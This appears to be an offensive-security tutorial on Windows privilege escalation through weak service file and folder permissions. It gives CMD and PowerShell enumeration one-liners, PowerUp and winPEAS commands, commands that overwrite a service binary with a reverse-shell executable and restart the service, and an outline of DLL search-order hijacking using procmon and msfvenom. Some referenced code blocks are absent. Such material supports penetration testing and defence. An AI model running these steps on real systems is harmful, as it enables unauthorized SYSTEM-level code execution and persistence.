Weak File/Folder Permissions

Given sufficient permissions over a service's binary, swapping it with our own binary enables us to gain code execution as the user configured to run this service.

To identify weaknesses in service binary permissions, we can take the following steps: retrieve a complete list of all service binary files, retrieve their permissions, identify specific ones for our controlled user.

We can perform such enumeration by using one of the following methods:

CMD

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

PowerShell

Get-WmiObject Win32_Service | ForEach-Object { $serviceName = $_.Name; $path = $_.PathName; $startName = $_.StartName; if ($path -ne $null -and $path -ne "") { $formattedPath = if ($path -match '.*\.exe') { if ($path -match '^"(.+?\.exe)') { $matches[1] } else { $path -replace '^(.*\.exe).*', '$1' } } else { $path }; $acl = try { Get-Acl -Path $formattedPath -ErrorAction Stop } catch { $null }; if ($acl -ne $null) { $relevantACE = $acl | Select-Object -ExpandProperty Access | Where-Object { $_.FileSystemRights -match 'Write|FullControl|Modify' }; if ($relevantACE) { [PSCustomObject]@{ ServiceName = $serviceName; FormattedPath = $formattedPath; StartName = $startName; ACL = $relevantACE | Select-Object -Property IdentityReference, FileSystemRights | Format-List | Out-String } } } } } | Sort-Object -Property FormattedPath -Unique | Format-List

PowerUp

. .\PowerUp.ps1
Get-ModifiableServiceFile

winPEAS

winPEASx64.exe servicesinfo

If we find an editable service binary, we can simply replace it with a malicious one as follow:

# Backup the binary
copy /y "c:\Program Files\File Permissions Service\filepermservice.exe" c:\Temp\filepermservice_backup.exe

# Hijack the binary 
copy /y c:\Temp\reverse.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

Then, restart the service to trigger the execution

#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice

#Using net
net stop <Service_Name> && net start <Service_Name>

#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>

#Exemple of getting StartMode for MySVC
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'MySVC'}

#Reboot
shutdown /r /t 0 

In case you have write permissions over the service binary folder, we can write our DLL in and then hijack the DLL search order. Here is the default DLL search order in windows (in safe mode which is the default):

1. The executable directory.

2. The system directory.

3. The 16-bit system directory.

4. The Windows directory.

5. The current directory.

6. The directories that are listed in the PATH environment variable.

We can enumerate permissive service folders by using the following PowerShell command

If we find a writable service folder, we first want to exfiltrate its service binary to a local windows machine. On this controlled computer, download Process Monitor (procmon) to monitor for missing or hijackable DLLs.

In procomon, specify this three filters (edit the service name with yours):

We may find some CreateFile actions with a NAME NOT FOUND result for a dll inside of the writable service binary folder. If so we can use this DLL name for DLL Hijacking !

If we've found a DLL we can hijack, the hard part is over. Now let's compile a custom DLL using the following code (in this example, the vulnerable DLL is named "hijackme.dll").

Or use msfvenom to directly generate a malicious DLL.

Now, after transferring the DLL to the target host, copy the DLL to the path we found.

Finaly, restart the service to trigger the execution